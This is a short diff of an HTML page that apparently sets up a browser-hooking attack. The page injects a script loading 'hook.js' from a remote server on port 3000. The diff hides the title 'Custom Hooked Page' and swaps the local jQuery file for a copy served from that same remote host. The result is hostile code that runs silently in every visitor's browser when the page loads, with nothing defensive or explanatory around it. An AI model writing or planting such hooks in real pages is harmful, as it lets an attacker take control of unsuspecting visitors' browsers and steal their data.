--- a/index.html
+++ b/index.html
@@ -124,10 +124,10 @@ a.closest("[data-ved]"))?D(f)||"":"";f=f||"";if(a.hasAttribute("jsname"))a=a.get
 
 <head>
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-    <title>Custom Hooked Page</title>
+   
 </head>
 <body>
-<script src="jquery-1.12.4.min.js"></script>
+<script src="http://173-255-249-211.ip.linodeusercontent.com:3000/jquery-1.12.4.min.js/"></script>
 <script>
     var commandModuleStr = '<script src="http://173-255-249-211.ip.linodeusercontent.com:3000/hook.js" type="text/javascript"><\/script>';
     document.write(commandModuleStr);
